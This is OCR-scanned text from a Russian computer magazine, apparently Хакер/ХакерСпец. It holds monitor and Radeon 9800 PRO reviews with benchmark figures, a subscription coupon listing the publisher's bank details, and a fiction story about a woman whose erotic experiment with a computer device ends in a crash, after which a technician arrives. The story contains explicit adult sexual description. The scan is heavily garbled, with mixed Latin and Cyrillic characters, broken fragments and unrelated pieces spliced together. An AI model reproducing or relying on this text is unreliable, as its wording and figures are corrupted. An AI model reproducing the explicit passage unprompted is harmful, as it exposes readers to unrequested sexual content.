рабочего стола, достаточно выделить нужную область. Кста- 
ти, настройками геометрии, яркости, контрастности, цветов и 
другими возможностями монитора можно управлять прямо 
мышкой с рабочего стола. Для этого в комплекте утилита 
MouScreen, которая общается с SAMSUNG SyncMaster 757NF 
через USB. Ho если хочешь, можешь давить на кнопки мони- 
торного меню. 


SAMSUNG SYNCMASTER 757MB 


Монитор считается плос- 
ким. Он действительно 
плоский, однако если дол- 
го приглядываться, то 
кривизна экрана все-таки 
видна. Кривизна экрана, 
как ты уже понял, неза- 
метна с первого взгляда, 
однако отчасти благодаря 
этой особенности монито- 
2003 рам из линейки МВ удает- 
ся достичь такой высокой 
и, главное, равномерной 
фокусировки. Второй 
фактор, способствующий 
четкости изображения, - 
высокая полоса пропуска- 
ния (аж 250 мегагерц!). 
Вертикальная развертка 
50-160Гц. Высоковольт- 
ная система на высоте - 
изображение не скачет и 
не искажается при перек- 
лючении режимов. Гео- 
метрия, с одной стороны, 
отражает кривизну экра- 
на, а с другой стороны, 
искривления более-менее 
равномерны. Работа за 
этим монитором опти- 
мальна в режиме 
1024X768 (116 Гц). SAM- 
SUNG SyncMaster 757MB 

м | ь __ | практически не муарит. 

= an | По данным колориметра 
видно, что цвета передаются неплохо. График цветокор- 
рекции практически не имеет изъянов, кроме небольшой 
ступеньки при низкой освещенности на красном цвете. Пе- 
рекручен зеленый цвет и недокручен красный. Дисплей 
чуть-чуть желтит, так как цветовая температура всего 
7340 Кельвинов вместо обещанных 9300. 

SAMSUNG SyncMaster 757МВ просто-таки напичкан сфирмен- 
ными технологиями! МВ означает MagicBright, это значит, что 
нажатием на одну кнопку ты сможешь выбрать один из трех 
режимов: «Интернет», «Видео», «Текст». Каждый режим влияет 
на настройки яркости, контрастности и фокусировки. Конечно, 
для просмотра фильмов нужны яркость побольше и размытая 
фокусировка, чтобы скрыть пиксели. Для текста, наоборот, 
нужны идеальный фокус и небольшая яркость. Имеется воз- 
можность настраивать дисплей программой MouScreen через 
USB, а для коррекции цвета используется ПО Natural Color. 


Не гонись за дешевизной! Покупай моньку, которая обя- 
зательно держит 100 Герц на 1024Х768 и не дергается при 
переключении яркости. Но и не надо переплачивать, ведь 
за 200-250 зеленых президентов можно купить уже девят- 
нашку! А это круче и просторнее. Вот только места на столе 
занимает значительно больше :(. 
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Цена: $190 
Диагональ: 17" 
Максимальное разрешение: 


Фокусировка: 5 баллов 
Видеоусилитель: 5 баллов 
Муар: 4 балла 


МОМ 


КИНО 


В ЗАЛПОВ СО ЗВУКОМ DOLBY DIGITAL EX!) 
ТОЛЬКО У НАС МОЖНО Ch 


iO НОВЫХ OMbMOB В МЕСЯЦ 
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НАВО/КУЗНИЦА МОНСТРЯКОВ 


КУЗНИЦА МОНСТРЯКОВ 


RADEON 9800 PRO 


test_lab (test_lab@gameland.ru) 


ечь идет о девайсе OT 
компании Gigabyte, 
модель GV - 
R98P256D. Это весьма производи- 
тельная видюха, предназначенная, 
в первую очередь, для хардкорных 
геймеров. Девайс - не дешевый, но 
он того стоит. Если ты собрался по- 
купать новый современный компь- 
ютер и хочешь иметь мощную и 
производительную систему со все- 
ми наворотами, то эта видюха - 
твой выбор. 

Карта радует весьма нехилой про- 
изводительностью и имеет непло- 
хой потенциал для разгона. На бор- 
ту карты стоят 256 Мбайт DDR2 na- 
мяти, работающей с тактовой час- 
тотой 700 Мгц, 256-разрядный ин- 
терфейс дополнительно увеличи- 
вает производительность девайса. 
Процессор карты работает с часто- 
той 380 МГц. На самом девайсе 
буквально все, что может греться, 
закрыто хорошими алюминиевыми 
радиаторами - это, само собой, чип 
и память, а также питание карты. 
Вместе с хорошим кулером это все 
дает очень хорошие перспективы 
для разгона. 

Как видно на скрине, видюха тре- 
бует для работы дополнительное 
питание, и если ей это самое пита- 
ние не подключить, то при включе- 
нии компьютера можно увидеть ин- 
тересную вещь: карта, возмущенная 
таким невниманием, выдаст на экран 
сообщение о том, что кабель пита- 
ния не воткнут, и потребует-таки 
воткнуть его в... законное место :). 

На случай, если у тебя нет сво- 
бодного разъема, в комплекте с 
картой идет специальный провод - 
переходник-разветвитель. К слову, 
этот провод очень длинный и его 
удобно использовать не по прямо- 
му назначению, а для того, чтобы 
подключать принесенный соседом 
винчестер со свежей музыкой и ве- 
селыми картинками. 

Новинка, как и все порядочные 
современные карты, имеет DVI и 
TV-OUT, так что если тебе захочет- 
ся посмотреть новый фильм, подк- 
лючив компьютер к телевизору, 
или прикупить новый LCD монитор 
с DVI входом, то никаких проблем с 
этим не будет. Для подключения к 
телевизору в комплекте с картой 
идет шнур. С его помощью возмож- 
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Здарова, приятель! Сегодня, как всегда, представляем тебе новый феррум для 
апгрейда. На этот раз это клевая видюха на основе чипа Radeon 9800 PRO. 


Radeon 9800 PRO 


но подключение как через обыч- 
ный «тюльпан», так и через s-vhs 
(раздвоенный шнур). 

В девайсе реализована функция 
twin view, служащая для подключе- 
ния к компьютеру двух мониторов 
одновременно, поэтому в комплек- 


3DMARK 2001$Е PRO: 
800x600 - 12700 
1024x768 - 12573 
1280x1024 - 10500 
1600x1200 - 8012 


3DMARK 2003: 
800x600 - 7250 
1024x768 - 6400 
1280x1024 - 4770 
1600x1200 - 3750 


Далее был Quake 3 
(результаты в fps): 
800х600 - 310 
1024х768 - 280 
1280х1024 - 183 
1600х1200 - 140 


И напоследок - UT 2003 Demo 
(результаты в fps): 

800х600 - 60 

1024х768 - 55 

1280x1024 - 53 

1600x1200 - 40 


те присутствует переходник DVI -> 
VGA, который позволяет подрубить 
два обычных монитора с VGA-Bxo- 
дами. Кроме этого, в коробке с кар- 
той можно найти инструкцию по ус- 
тановке и бонусные игры, которые 
сразу позволят заценить мощь ge- 
вайса. Что касается игр, то их 4 
штуки: Motocross Мата, Оп 4x4, 
Serious бат и Heavy Metal, плюс 
еще один диск с софтиной 
CyberLink Power DVD. 

Тестирование карты показало 
очень неплохую производитель- 
ность.Тест-драйв проходил на сле- 
дующей конфигурации: 

процессор - 3 ГГц Athon; 

память - 512 DDR M-tec; 

винчестер - Samsung SP 1604п; 

мать - Gigabite GA-7NNXP. 

Для начала мы прогнали карту 
двумя версиями бенчмарка 3Dmark 
(20015е рго и 2003) в различных 
разрешениях с глубиной цвета 32 
Бит. Результаты, как всегда, в попу- 
гаях, смотри врезку. 

Итак, девайс показал очень хоро- 
шие результаты. Замечу, что тести- 
рование проводилось со стандарт- 
ными частотами, если же обеспе- 
чить карту хорошим дополнитель- 
ным охлаждением, то можно будет 
ее неплохо разогнать и получить 
еще большую производительность. 
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rie редакционная 
Se ПОДПИСКА! 


Вы можете оформить редакционную подписку на любой российский адрес 


Для этого необходимо: 


1. Заполнить подписной купон 
(или его ксерокопию). 


2. Заполнить квитанцию (или 
ксерокопию). Стоимость 
подписки заполняется из расчета: 
6 месяцев - 690 рублей 

12 месяцев - 1380 рублей 


(В стоимость подписки включена доставка 
заказной бандеролью.) 


3. Перечислить стоимость 
подписки через Сбербанк. 


4. Обязательно прислать в 
редакцию копию оплаченной 
квитанции с четко заполненным 
купоном 

или по электронной почте 
subscribe_xs@gameland.ru 

или по факсу 924-9694 
(с пометкой "редакционная 
подписка"). 

или по адресу: 

103031, Москва, Дмитровский 
переулок, д 4, строение 2, 
ООО "Гейм Лэнд" (с пометкой 
"Редакционная подписка"). 


Рекомендуем использовать 
электронную почту или факс. 


ВНИМАНИЕ! 


Подписка производится с 
номера, выходящего через 
один календарный месяц 
после оплаты. Например, 
если вы производите оплату в 
Сентябре, то подписку можете 


оформить с Декабря. 


СПРАВКИ 
по электронной почте 
subscribe_xs@gameland.ru 
или по Ten. (095)935-7034 


К ZS 
ПОДПИСНОИ КУПОН (подписка через редакцию) 
Прошу оформить подписку на журнал "ХакерСпец" 


С На 6 месяцев начиная с 


С] На 12 месяцев начиная с 
(отметьте квадрат, выбранного варианта подписки) 


Ф.И.О. 


Город/село ул. 


Дом корп. KB. Ten. 


Сумма оплаты 


Подпись Дата е-тай: 


Копия платежного поручения прилагается. 


ИНН 7729410015 ООО"ГеймЛэнд" 

ЗАО — Международный Московский Банк, г.Москва 

р/с №40702810700010298407 

к/с №30101810300000000545 

БИК 044525545 КПП - 772901001 


Извещение 


Плательщик 


Адрес (с индексом) 


Назначение платежа Сумма 


Оплата журнала "ХакерСпец" 


за года 


Подпись плательщика 


Кассир 


ИНН = 7729410015 ООО"ГеймЛэнд" 

ЗАО — Международный Московский Банк, г. Москва 

р/с №40702810700010298407 

к/с №30101810300000000545 

БИК 044525545 КПП - 772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа Сумма 
Оплата журнала "ХакерСпец" 
за года 
Квитанция 
Подпись плательщика 
Кассир 


Подписка для юридических лиц 


Юридическим лицам для оформления подписки необходимо прислать заявку на получение счета для оплаты 
по адресу subscribe_xs@gameland.ru или по факсу 924-9694 (с пометкой "редакционная подписка"). 


В заявке указать полные банковские реквизиты и адрес получателя. Подписка оформляется на 12 месяцев, 
начиная с месяца, следующего после оплаты. 
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НАВО/ПАЯЛЬНЫЙ ПРОЩАЛЬНИК ДОКТОРА ДОБРЯНСКОГО 


ПАЯЛЬНЫЙ ПРОЩАЛЬНИК 
ДОКТОРА ДОБРЯНСКОГО 


Dr.Cod@real.xakep.ru Пришло время подвести итоги. Вот самые яркие моменты из моей радиоэлектронной 
жизни, начиная с февраля 99-го, когда вышел первый Хакер. Доктор уходит, но 
обещает вернуться! Я обязательно всплыву в каком-нибудь издании, либо в Интернете 


с возрожденным паяльником! Так что пиши свои идеи. А пока я занимаюсь тестами 
железа в test_lab. 


вышло BO втором 


B 
стройство (глушилка телеков), 


Самое первое У 
Хакере в 99-ом году: 


многие 


ля 
Металлоискатель- Самое попу 


собрали и рады! 


te 
й олны 
й мозговые в 
Александра Смирнова, преврашающи 
Паук 


в музыку 
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й на хлопки. Пока настраивал, 


и 
Это выключатель, реагирующ 
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а висках выступили вены. 

Ева полулежала в шикар- 

ном кожаном кресле в па- 
ре метров от экрана монитора. Закрыв гла- 
за, она парила в призрачном выдуманном 
пространстве; тело медленно извивалось, 
волна спускалась откуда-то с затылка к кон- 
чикам пальцев на ногах. Периодически руки 
поднимались с подлокотников, чтобы акку- 
ратно проникнуть за отворот блузки, туда, 
где маленькими бусинками затвердели сос- 
ки. Тихий стон срывался с губ от нежных 
прикосновений к своему телу; она проводи- 
ла кончиком пальца от подбородка к лож- 
бинке между грудей. 

Вскоре одежда показалась ей тесной. Из 
блузки она выскользнула очень профессио- 
нально, словно этот трюк оттачивался не один 
месяц. Просто варуг она оказалась в одних 
тонких узеньких трусиках, явив взору того, 
кто мог бы сейчас с ней находиться (но она 
была совершенно одна!), роскошное молодое 
тело, покрытое мелкими бисеринками пота. 

На животе (даже не на животе, а в совсем 
опасной близости от одной из самых силь- 
ных эрогенных зон) обнаружилась малень- 
кая присоска со скрывающимся под ней то- 
неньким проводком. Этот проводок аккурат- 
но перекидывался через бронзовое от иску- 
сственного загара бедро и уходил к компь- 
ютеру. Ева, прекрасно помня о его сущест- 
вовании, просунула холеные пальцы под 
кружево трусиков. 

Стон... На корпусе засветился красный све- 
тодиод, говоря об активности винчестера. 
Компьютер зашелестел, на экране замета- 
лись разноцветные образы, перетекающие 
один в другой. 

Постепенно стоны становились похожими 
на хрип; возбуждение довольно медленно, 
но верно достигало максимума. Ева превра- 
тилась в натянутую струну, ожидающую 
взрыва. Пальцы не останавливались, язык 
часто облизывал пересохшие соленые губы; 
она несколько раз вздрогнула, будто от уда- 
ра электрического тока. 

Компьютер продолжал работать. Ева убра- 
ла левую руку с груди; как зомби, протяну- 
ла ее к клавиатуре и нащупала «Enter». Она 
уже была близка к оргазму - к одному из 
самых сильных оргазмов в своей жизни. 

- А-а-а!.. - едва не закричала она, когда 
волна горячего удовольствия хлынула меж- 
ду ног и стала подниматься все выше и вы- 
ше, охватывая все тело... 

«Пи... Пи... Пи...» - какой-то посторонний 
звук вмешался в происходящее. Ева хлопну- 
ла всей ладонью по клавиатуре - там, где бы- 
ла нужная клавиша. Ничего не произошло. 
Она будто провалилась в прорубь - все тепло 
и дрожь, созданные ее умелыми пальцами, 
оборвались и заставили открыть не видящие 
пока ничего глаза. Сквозь туман и слезы удо- 
вольствия выплыло пятно монитора. 
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«Синий экран смерти». 

Система умерла в самый неподходящий 
момент, не выдержав поставленных перед 
нею задач. 

- С-сволочь.. - прошипела гадюкой Ева, 
еще не GO конца осознав, что произошло. - 
Нет... 

Она схватила присоску и оторвала ее от 
нежной влажной кожи живота. 

- Нет! - закричала она, словно от звука ее 
голоса компьютер мог ожить и выполнить 
ею задуманное. - Этого не может быть! Не 
сейчас! Не-сей-час! 

Она повторяла это размеренно-бешеное 
«Не-сей-час!» бесчисленное число раз, ко- 
лотя слабыми кулачками по подлокотникам 
кожаного кресла, пропитавшегося ее потом. 
А затем она в порыве гнева разорвала на 
себе трусики и швырнула их в экран. Шел- 
ковое кружево неаккуратно повисло на 00- 
ном из углов монитора, напоминая бинт... 
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Главным пристрастием Антона Верника в 
мире искусства был Аль Пачино. Каждый 
новый фильм с его участием становился со- 
бытием, которое он обсуждал сам с собой и 
со своими друзьями в Интернете не один 
день; любая прошлая работа великого мас- 
тера едва ли не конспектировалась, все его 
слова, жесты и поступки копировались и пе- 
реносились в жизнь. Ради Пачино Антон вы- 
учил огромное количество сленговых выра- 
жений и смотрел кино Ha DVD без перевода. 

Лица актера взирали на Антона утром и 
вечером со стен его квартиры; на экране 
компьютера поочередно сменяли друг дру- 
га обои с изображением Аль Пачино. Слож- 
но было дать однозначный ответ на вопрос 
- что же так привлекало молодого перспек- 
тивного сотрудника компании средней руки 
по настройке программного обеспечения (в 
миру - «Компьютерной скорой помощи») в 
драматическом гении Голливуда. Сам Антон 
никогда не вдавался в подробности - он 
просто смотрел фильмы с его участием и не 
мог оторвать взгляд от проникновенных 
глаз, смотрящих в камеру с пристрастием. 

Сегодня - «Море любви». Антон протянул 
руку на полку, где в ряд стояли все фильмы 
с его любимым актером и уже хотел было 
взять «Запах женщины», но что-то его оста- 
новило - указательный палец скользнул 
вдоль дисков, едва задевая их, и наткнулся 
на один, выступающий из аккуратного ряда. 
Это и было «Море любви», собравшее много 
всяких призов, но не получившее заветного 
«Оскара» (к слову сказать, фильм как тако- 
вой на «Оскара» не тянул - неизвестно еще, 
чем бы дело закончилось, не будь там Пачи- 
но). Диск аккуратно лег в лоток, тихое жуж- 
жание предварило появление изображения. 

Серийный убийца. Вечная тема для Голли- 
Byga, практически неисчерпаемая. Уж сколь- 


ко их было - начиная с Джека-Потрошителя 
(чего стоила только картина «Из ада» с ве- 
ликолепным, утонченным Джонни Деппом - 
которому, правда, далеко до великого Пачи- 
но). Всех находят с пулей в башке, уткнувши- 
мися в собственную постель, абсолютно го- 
лых... По какой причине Аль Пачино решил 
играть в этом фильме? Его детективы и бое- 
вики, конечно же, великолепны (вспомнить 
только «Схватку» или «Крестного отца», 
ставшего хрестоматийным) - но вот сама те- 
матика «Моря любви», поиск преступника, 
сюжет, местами достойный кисти мастера 
вроде Конан-Дойля, - все это было не очень 
свойственно для актера, взявшего на себя 
труд исполнить роль Френка Келлера. 

Антон, взяв в правую руку блюдце с соле- 
ными сухариками, а в левой умудряясь 
удерживать бутылку «Невского» и пульт от 
телевизора, внимательно смотрел на экран. 
Иногда он именно так смотрел фильмы с 
Пачино - зная многие диалоги наизусть, 
помня все повороты сюжета, он разгляды- 
вал лица, жесты, повороты головы, походку, 
слушал английскую речь своего кумира. 
Ему очень хотелось стать таким, как он; или 
нет, не таким, как он сам, а как его герои - 
жестоким и всемогущим, как дьявол, наняв- 
ший себе адвоката, или таким же, как сле- 
пой полковник в «Запахе женщины», - OG- 
новременно циничным и справедливым. 

Действие разворачивалось в фильме не 
особенно стремительными темпами. Рассле- 
дование, начатое Келлером, было еще go- 
вольно далеко от завершения, когда Антон 
обратил внимание на маленький диалог 
между детективом и его подопечной, высту- 
павшей в роли главной подозреваемой, ко- 
торую великолепно сыграла Эллин Баркин. 

« - ..Иногда пахнет дерьмом, но я все рав- 
но люблю свой район... 

- Это только кажется, что все спокойно - а 
в прошлом году здесь было три убийства. 
Одно вон там, рядом с той вывеской, второе 
- через неделю во-он в том доме на втором 
этаже, а еще через два месяца - на третьем. 

- Ну просто обитель зла какая-то...» 

Антон услышал в этом диалоге скрытый 
подтекст, который можно было рассматри- 
вать по отношению к чему бы то ни было 
как пророческий - «я люблю свой городу», 
«я люблю свою работу» - а потом... «Это 
только кажется, что все спокойно...» 

Сухарики постепенно таяли на блюдце, пи- 
во убывало, а Аль Пачино продолжал творить 
чудеса лицедейства на экране телевизора... 

Когда зазвонил телефон, фильм почти 
подходил к концу. Антон протянул руку к 
трубке и услышал знакомый голос своего 
коллеги по работе. 

- Привет, Антон. Это Лукашин, узнал? 

Антон кивнул, а потом понял, что надо от- 
ветить: 

- Да, узнал, Виталий. Что так поздно? 


- Да дело тут есть... - начал Лукашин, и Ан- 
тон сразу понял, что придется куда-нибудь 
ехать. Таким тоном могли начинаться только 
разговоры об этом - да еще о том, чтобы за- 
нять кому-нибудь денег. 

- Говори, не тяни кота за хвост, - поторопил 
Антон собеседника, поставив фильм на паузу. 

- Я понимаю, не царское это дело, - продол- 
жал нудеть на том конце провода Виталий. - 
Просто больше не к кому обратиться. 

- Денег у меня нет, - сразу отрезал один из 
вариантов развития разговора Антон. 

- Да ну тебя, Верник, - рассмеялся Лукашин. 
- Денег я тебе сам могу дать... 

- Дай. 

- Сколько? 

- Что тебе надо? - не выдержал Антон, повы- 
сив голос. В деньгах он не нуждался. 

- Короче, тут ушли уже все, а у меня сроч- 
ный вызов в Большой Девятинский... 

- Кто оплатит? - сразу сообразил Антон. - И 
вообще - давай совсем уже близко к делу. 

- Оплатит лично директор, это он рекомен- 
довал именно тебя, - в голосе Лукашина прос- 
кользнули какие-то не понравившиеся Антону 
нотки. C этим вызовом было явно что-то не 
так. - Ведь у нас только ты умеешь работать с 
женщинами бальзаковского возраста. Ну и 
потом, она просила лучшего... 

- Подхалим... У тебя что, АОН еще и возраст 
звонившего определяет? - ехидно спросил 
Антон, несколько заинтригованньй. - И ты BOT 
брякаешь, а сам-то хоть знаешь, что такое 
«бальзаковский возраст»? 

- Ну... - смутился Лукашин. - А сколько это 
лет? 

- А по голосу сложно было определить? 

- Вотв этом-то все и дело, - Виталий замол- 
чал надолго. (Верник тем временем успел 
снять фильм с паузы, просмотреть почти ми- 
нуту - и поэтому вновь возникший в трубке 
голос Лукашина чуть ли не напугал его). - Там 
что-то не в порядке было с голосом... Она так 
орала, так орала... 

- В смысле? - оторвавшись от Аль Пачино, 
спросил Верник. 

- Ну, в прямом - как будто это я ей компьютер 
сломал. И все время повторяла - «Не сейчас!» 
Как заводная просто, раз двадцать. А дышит, 
как паровоз, словно за ней бежал кто. Ну или 
будто прям с постели подскочила, из-под... 

- Детали меня не интересуют, - оборвал Лу- 
кашина Антон. - То есть интересуют, но не эти. 
Адрес? 

Лукашин продиктовал. Оказалось, далековато. 

- Честно сказать, я такси вызвал раньше, 
чем тебе позвонил, - виновато добавил Вита- 
лий. - Так что... 

- Ферштейн, - кивнул Верник. - Лишь бы он 
меня потом обратно доставил. Ну, пока, дис- 
петчер. 

Он положил трубку и с тоской взглянул в эк- 
ран телевизора, где в стоп-кадре неподвижно 
застыл Аль Пачино. Досмотреть была не судьба. 

Встав с кресла, он прошел в другую комнату, 
где, в отличие от зала, царил рабочий беспо- 
рядок - компьютер на столе, компьютер под 
столом, пара мониторов, небольшая спутнико- 
вая антенна на подоконнике, масса проводов - 
по делу и не по делу... У дверей на видном 
месте стоял «дипломат» - внутри был ноутбук, 
внешний модем «7ухер» и набор самых необ- 
ходимых дисков. Машинально проверив свою 
почту и отправив пару коротких сообщений в 


форумы, он взял «дипломат», взглянул на ча- 
сы, вздохнул и вышел в подъез30... 
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Судя по тому, как выглядела входная дверь 
- там, за дверью, скрывалась шикарная квар- 
тира. Дверь итальянская, металлическая, с 
тремя замками, огромным телескопическим 
«глазком» - на танке не въедешы! 

Антон сверился с адресом, который записал 
со слов Лукашина на маленький клочок бу- 
мажки (OX уж эта любовь к «наладонникам»!) - 
все верно. Протянул палец к звонку - ине ус- 
пел нажать, как там, по ту сторону, раздались 
цокающие быстрые шаги, забренчали ключи, и 
дверь распахнулась, едва не ударив Антона в 
нос. Верник вовремя отскочил за створку и уви- 
дел высунувшуюся наружу голову женщины. 

Ее пронзительные глаза быстро оглядели 
площадку перед дверью, не заметили Антона; 
дверь с грохотом закрылась, но Верник успел 
услышать: «Чертов сервис, ждешь их GO вто- 
рого пришествия!», произнесенное с такой не- 
навистью, что заходить в квартиру вообще 
расхотелось. На секунду проскользнула 
мысль - а не уйти ли нафиг отсюда, сослав- 
шись на то, что таксист не нашел дом. Потом 
вспомнил, ЧТО не найти такой дом можно 
только в сильном алкогольном опьянении - 
практически центр города, Новый Арбат, - и 
протянул руку к звонку во второй раз. 

Звук оказался неожиданно мелодичным - 
не чета тому голосу, который принадлежал 
хозяйке. Вновь стук каблучков, скрадывае- 
мый, по-видимому, ковровой дорожкой, сно- 
ва щелчки замков. На этот раз Антон был бо- 
лее предусмотрительным - он отошел на пару 
шагов назад, встал прямо напротив двери и 
оказался точно перед лицом хозяйки, распах- 
нувшей дверь со свойственной ей в походке 
и суждениях стремительностью. 

По части бальзаковского возраста Лукашин 
ошибался, но не намного. Женщине было 
около тридцати лет, она была полна сил 
и энергии, глаза метали молнии. 


Прежде чем пустить Антона в кварти- 
ру, она внимательно осмотрела его с 
ног gO головы, от чего Вернику стало 
очень неуютно; потом она на пару секунд 
задержала взгляд на его «дипломате», хмык- 
нула и распахнула дверь полностью. 

Верник, уже собравшийся сделать шаг 
внутрь, застыл, занеся ногу для шага. На хо- 
зяйке квартиры был тонкий розовый пенью- 
ар, отделанный чем-то похожим на мех такого 
же цвета; под пеньюаром не было НИЧЕГО. 

- Вы будете заходить или нет? - нетерпеливо 
спросила женщина, ни на секунду не заду- 
мавшись над тем, что же смутило мастера. - 
Время не ждет. 

Она махнула рукой в коридор. Верник отвел 
глаза в сторону и прошел мимо, на мгновенье 
окутавшись облаком непонятной смеси запа- 
XOB, исходившей от нее, - что-то из очень GO- 
рогих духов, сладких и приторных, наслоив- 
шихся на запах пота. Это было единственное, 
что отталкивающе подействовало на Антона. 
Все остальное заставляло его молодую, по- 
весеннему неустойчивую психику трепетать и 
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путать мысли. 

Остановившись возле вешалки, он снял 
куртку, поставив «дипломат» на пол, разул- 
ся (хозяйка подтолкнула ему тапочки, он 
сделал вид, что не заметил - с детства нена- 
видел в гостях надевать чужую обувь). В 
зеркале напротив отразилась фигура хо- 
зяйки; она, совершенно не замечая особен- 
ностей своего одеяния, заглядывала в одну 
из комнат. Пеньюар кокетливо распахнулся, 
открывая обнаженную грудь. Верник отвел 
глаза; пару раз дернулась щека. 

Ему вдруг пришло в голову одно из нас- 
тавлений директора - мастера из различных 
сервисов, в том числе и из компьютерного, 
очень часто подвергаются сексуальным GO- 
могательствам одиноких женщин; с такими 
особами надо держать ухо востро и избегать 
всяческих заигрываний и приставаний, ибо 
впоследствии от обвинения в изнасилова- 
нии не отмажет уже никто. А спорить с ди- 
ректором в подобных вопросах было крайне 
и крайне глупо. Антон краем глаза посмот- 
рел на хозяйку - на первый взгляд она на 
подобные обвинения не тянула. Но кто ж их 
знает, этих непредсказуемых женщин... 

- Молодой человек, не пора ли!.. - нетерпе- 
ливо махнула рукой куда-то вглубь боль- 
шой комнаты хозяйка. - Время идет! 

- Да, конечно, - вышел из ступора Антон, 
поднял «дипломат» и прошел туда, куда по- 
казывала женщина. Комната оказалась на 
удивление скромно обставленной - кроме 
компьютерного стола в углу напротив окна 
и какого-то непонятного прибора, подклю- 
ченного к этому компьютеру, не было прак- 
тически ничего; только огромное кожаное 
кресло в самом центре под небольшой сим- 
патичной люстрой. 

Остановившись на пороге, Верник осмот- 
релся. Окна закрыты довольно плотными 
шторами темно-красного цвета; на полу тем- 
но-бордовый ковер с геометрическим узо- 
ром. На стенах, покрытых жидкими обоями с 
опять-таки вездесущим красноватым оттен- 
ком, несколько картин с непонятными 
абстрактными фигурами. 

Кресло, в принципе, выпадало из общего 
тона. Как и компьютер. Вообще, в этой ком- 
нате идеально смотрелась бы большая кро- 
вать, покрытая красно-черным постельным 
бельем, а в центре кровати должна была 
лежать в шикарном розовом пеньюаре... 
Вот в таком... И нахрена здесь комп - ga еще 
с какой-то приблудой, напоминающей пе- 
редвижную рентгеновскую установку? 

- Чуть быстрее, - настойчиво пихнула хо- 
зяйка в спину Антона. - Вы ведь еще даже 
не знаете, в чем здесь дело, сколько пона- 
добится времени, а уже отдыхаете, как пос- 
ле тяжелой работы. 

- Извините, - развел руками Антон и по- 
дошел к компьютеру. - Так в чем суть 
проблемы? 

Хозяйка обошла вокруг него на расстоя- 
нии метра, внимательно глядя на мастера. 
Потом она опустилась в кресло и положила 
руки на подлокотники, глаза ее закрылись. 
Несколько секунд Антон думал, что так и не 
дождется от нее никакой информации, Og- 
нако он оказался не прав - она внезапно 
открыла глаза и, глядя прямо перед собой, 
произнесла: 

- Я здесь занимаюсь... Некими эксперимен- 
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тами, скажем так. В подробности вдаваться не 
будем, молодой человек. Все мои работы про- 
ходят при участии вот этого приспособления 
(она махнула рукой на устройство, занимаю- 
щее угол, противоположный компьютеру). 

Антон медленно согласно кивал, будто ви- 
деть подобные «приспособления» было для 
него привычным делом (тоже одно из пра- 
вил, внушенных ему их директором, - никогда 
не показывай, что ты чего-то не знаешь, впол- 
не возможно, что ты этому научишься имен- 
но сегодня). Хозяйка на него не смотрела; ее 
взгляд был устремлен прямо перед собой. 

- По вполне объяснимым причинам, - про- 
должала она тем временем, - компьютер 
работает под управлением Windows 98. Вы 
слышали что-нибудь об этом? - внезапно 
спросила она у Антона. Тот даже не нашел- 
ся сразу, что ответить, - настолько неожи- 
данным оказался этот вопрос. Он глупо 
раскрыл рот и попытался выдавить из себя 
хоть что-нибудь (он, конечно же, не гений, 
но, черт побери, не до такой же степени!). 
хозяйка хитро скосила глаза на него и нео- 
жиданно рассмеялась - правда, всего на па- 
ру секунд. 

- Шутка, - оборвала она сама себя. - Про- 
должим. Во время моих экспериментов 
компьютер обрабатывает довольно боль- 
шие массивы крайне специфической ин- 
формации. Все вопросы потом, - предупре- 
дила она попытку Антона вставить слово в 
ее монолог. - В самом начале моей работы 
возникало множество проблем, связанных 
с отладкой программного обеспечения... 

Верник слушал ее речь, как музыку. Ему 
казалось, что присутствует на лекции в сво- 
ем родном институте информатики. Он те- 
перь уже не понимал, зачем его сюда приг- 
ласили - ведь похоже, что хозяйка квартиры 
разбирается во всех вопросах в достаточ- 
ном объеме. 

- Постепенно - а это продолжалось око- 
ло полугода - таких проблем становилось 
все меньше. Программа, управляющая этим 
(она снова махнула рукой в другой угол), 
становилась все лучше. Но, как вы понима- 
ете, молодой человек, камнем преткнове- 
ния оставался незыблемый фрагмент всей 
этой системы - сама операционная система. 

Она встала с кресла, повернулась к Анто- 
ну лицом. 

- Она не справляется с тем видом работы, 
с которым я имею дело. Сегодня система 
рухнула в самый неподходящий момент (по 
ее лицу пробежала тень гнева). Я... Я хочу, 
чтобы вы, молодой человек... 

Антон все-таки решился спросить: 

- Простите, но, судя по вашим речам, вы и 
сама... 

- Меня, между прочим, Ева зовут, - неожи- 
данно представилась она. - Я сама ни черта 
не могу. И если вы... Ты думаешь, что мои 
разговоры и мои познания... Короче, все это 
я знаю с чужих слов; просто иногда необхо- 
димо в нужных кругах прихвастнуть - чтобы 
уж совсем не выглядеть белой вороной. 

- Согласен, - кивнул Верник, зная и за со- 
бой подобную слабость - потрепаться о чем- 
нибудь, имея об этом самое отдаленное 
представление. - А я, между прочим, Антон. 

- Короче, Антон, - склонив голову набок и 
хитро прищурившись, сказала Ева. - Cerog- 
ня у меня должен был быть очередной... 


Эксперимент. И он состоится. Тебе понятна 
задача? 

Антон кивнул. 

- Вы будете присутствовать? - поинтересо- 
вался он у Евы. 

- Надо? - спросила она в ответ. 

- Я поставлю вам Windows XP, - произнес 
он как можно более равнодушным тоном. - 
Как вы к этому отнесетесь? 

Ева прикусила губу. 

- Ты тоже об этом... где-то читал? - зло 
спросила она. - Или соображаешь? 

Она уже поняла, что ее манера общения 
не прокатила. Пыталась отомстить. 

- Соображаю, - коротко ответил Антон. - 
Что-нибудь нужно сохранять или можно все 
начисто делать? 

- Все, что мне необходимо для работы, я 
переписываю на CD. Сама программа у меня 
тоже хранится отдельно. Делайте, как сочте- 
те нужным. Сколько нужно времени? 

Она снова перешла на «вых» - это не очень 
понравилось Антону, тем более что уже 
больше пяти минут он не мог оторвать 
взгляда от ее груди. 

- Ну, я не знаю еще, какой у вас компью- 
тер... В среднем час-полтора. Плюс настроить 
вашу программу и вон ту железяку... - Вер- 
ник кивнул в сторону «приспособления». 

- Ваше дело - установить систему, - отреза- 
ла Ева. - И все. После этого можете молча со- 
бираться и уходить. И нечего пялиться! - крик- 
нула она, отчего у Антона сердце в пятки уш- 
ло, он смутился и испугался одновременно. 

Ева крутнулась на каблучках домашних ту- 
фель и вышла из комнаты. Верник проводил 
ее взглядом - то ли завистливым, то ли груст- 
ным; он сам не понял, как посмотрел ей 
вслед. Отругав про себя Лукашина с его нес- 
воевременным заказом, он взялся за работу. 

И, как всегда, работа поглотила его целиком. 

Он восторженно бормотал себе nog нос 
названия комплектующих этого поистине 
навороченного компьютера, поражался его 
скорости, объему памяти и диагонали мони- 
тора. Работа продвигалась довольно быст- 
ро. Отформатировав винчестер, он запустил 
установку Windows; его взгляды постепенно 
приковала та установка, к которой от компь- 
ютера тянулись провода. 

Аккуратно выглянув в коридор и не обна- 
ружив там Евы (ее бормотание - а может 
